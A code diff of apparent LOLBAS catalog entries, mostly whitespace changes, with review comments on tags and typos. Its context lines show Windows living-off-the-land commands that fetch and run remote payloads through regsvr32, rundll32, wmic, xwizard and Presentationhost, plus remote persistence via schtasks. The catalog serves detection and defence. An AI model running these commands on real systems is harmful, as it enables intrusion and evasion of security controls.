diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index a63a2a8..0898d43 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: XBAP + - Execute: XBAP - Command: Presentationhost.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml index 7f5b18b..16d6a11 100644 --- a/yml/OSBinaries/Provlaunch.yml +++ b/yml/OSBinaries/Provlaunch.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: CMD + - Execute: CMD Full_Path: - Path: c:\windows\system32\provlaunch.exe Detection: diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 43dc039..979d24d 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT - - Execute: Remote + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -22,7 +22,7 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT + - Execute: SCT - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting 
@@ -31,8 +31,8 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT - - Execute: Remote + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -41,7 +41,7 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT + - Execute: SCT Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index e1bb40c..5d60b29 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -30,7 +30,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution @@ -39,7 +39,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. Usecase: Proxy execution 
@@ -48,7 +48,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -57,7 +57,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml index 545b1c1..eafab60 100644 --- a/yml/OSBinaries/Runexehelper.yml +++ b/yml/OSBinaries/Runexehelper.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\runexehelper.exe Detection: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index fb02475..40b17aa 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: CMD + - Execute: CMD Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 2e58c2e..535aeff 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: Powershell + - Execute: Powershell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index bd016f0..7766c06 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream @@ -21,7 +21,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index c37e48e..82f9ab2 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation 
@@ -21,7 +21,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 4c5b141..bd8b118 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Description: Executes calc.cmd from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures @@ -21,8 +21,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: Remote - - Execute: CMD + - Execute: Remote + - Execute: CMD Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe diff --git a/yml/OSBinaries/Setres.yml b/yml/OSBinaries/Setres.yml index 6797060..4e4dd1d 100644 --- a/yml/OSBinaries/Setres.yml +++ b/yml/OSBinaries/Setres.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\setres.exe Detection: diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index 13fb36f..2fbd1f6 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: EXE - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 6d651b1..27a9f12 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 Tags: - - Execute: EXE + - Execute: EXE - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index aa42bf6..8c62daf 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index ec4e8b0..3d0cdd5 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Tags: - - Execute: Powershell + - Execute: Powershell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 42f0d66..145bd6f 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 2004 and above, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary 
@@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 1909 and below Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index c12ae91..7c51f38 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 1809 and newer, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index fabfae4..541818d 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index 2751183..e42e6b7 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index c8e61fc..6fa837f 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index d6be4bc..f914071 100644 
--- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Remote - - Execute: EXE + - Execute: Remote + - Execute: EXE - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 10f96cc..913ce05 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe Code_Sample: diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 133c4a8..49d52ef 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system 
@@ -30,8 +30,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE - - Execute: Remote + - Execute: EXE + - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system @@ -40,8 +40,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: XSL - - Execute: Remote + - Execute: XSL + - Execute: Remote - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6287b77..d2dd19a 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 87076e3..e7d9b93 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures 
@@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 8da75b1..b6204bf 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -28,7 +28,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: CMD + - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index c89260d..e9ce1bd 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -21,7 +21,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary 
@@ -30,7 +30,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -39,7 +39,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index 13b34e4..a96fe54 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection:
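Review bot: In every hunk of this patch, starting with Presentationhost.yml at `@@ -12,7 +12,7 @@`, the removed and added lines read identically (`- Execute: XBAP`), so the change is leading whitespace only, which this rendering does not preserve. Before merging, run the repository's YAML schema validation over the touched files and confirm that `Tags` still parses as a list of single-key maps nested under the same command entry, because an indentation shift in a block sequence can silently re-parent the list to the enclosing `Commands` item or to the document root without any error.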
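Review bot: Regsvr32.yml hunks `@@ -12,8 +12,8 @@` and `@@ -31,8 +31,8 @@` carry identical context, including the same `regsvr32.exe /s /u /i:file.sct scrobj.dll` command and the same "Execute the specified local .SCT script" description, and hunks `@@ -22,7 +22,7 @@` and `@@ -41,7 +41,7 @@` likewise repeat the `Execute: SCT` tag block. Since this patch touches those lines anyway, check whether the file has a duplicated pair of command entries or whether the repeated entries differ in a field outside the hunk (for example Privileges or OperatingSystem), and either drop the duplicates or make the distinguishing field visible in the Description.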
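Review bot: In Rundll32.yml hunk `@@ -57,7 +57,7 @@`, the `Execute: JScript` tag is the only tag on the preceding entry, the one whose command is `GetObject("script:https://raw.githubusercontent.com/...")` with usecase "Execute code from Internet". Elsewhere in this same patch, entries that fetch content over the network carry an additional `Execute: Remote` tag (Regsvr32.yml `@@ -31`, Wmic.yml `@@ -30` and `@@ -40`, Winget.yml `@@ -12`, Scriptrunner.yml `@@ -21`). Suggest adding `- Execute: Remote` to that entry so the tag taxonomy stays consistent across the corpus.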
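Review bot: Schtasks.yml hunk `@@ -12,7 +12,7 @@` has a doubled word in the trailing context line: `Usecase: Create a remote task to run daily relative to the the time of creation`. Since the file is being edited, fix it to "relative to the time of creation" in the same change.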
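Review bot: Wmic.yml hunk `@@ -30,8 +30,8 @@` shows a command and description that do not match each other: the command is `wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"`, but the description reads "Create a volume shadow copy of NTDS.dit that can be copied." and the usecase reads "Execute binary on remote system". The `/format:` form loads and executes script embedded in an XSL stylesheet fetched from a URL; the description and usecase appear to have been copied from a different entry. Suggest aligning them with the following entry's wording ("Executes JScript or VBScript embedded in the target remote XSL stylesheet" / "Execute script from remote system") and checking that the shadow-copy description has not been dropped from whichever entry it belongs to.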
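Review bot: Wmic.yml hunk `@@ -40,8 +40,8 @@` contains a typo in the trailing context line: `Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.` should read "stylesheet". Also, the command in that entry uses `\\127.0.0.1\c$\Tools\pocremote.xsl`, a loopback UNC path to the local machine, while the usecase says "Execute script from remote system"; consider an example host other than 127.0.0.1 or reword the usecase so the example and its description agree.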
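Review bot: msedgewebview2.yml hunk `@@ -39,7 +39,7 @@` has a version-pinned path in its context: `Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe`. Edge updates replace that versioned directory, so the path will be wrong on most systems soon after publication and any detection keyed on it will miss. Suggest using a placeholder for the version component, as the repository does for other install-specific path segments, or listing the parent directory with a note that the versioned subfolder varies.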
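Review bot: wt.yml hunk `@@ -12,7 +12,7 @@` ends with `Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe`, which is not a complete path: WindowsApps package folders carry a version and publisher-hash suffix after the underscore. If a placeholder for that suffix was intended, it is missing here; if the entry relies on a wildcard, say so explicitly so consumers matching on Full_Path do not treat the literal string as the on-disk location.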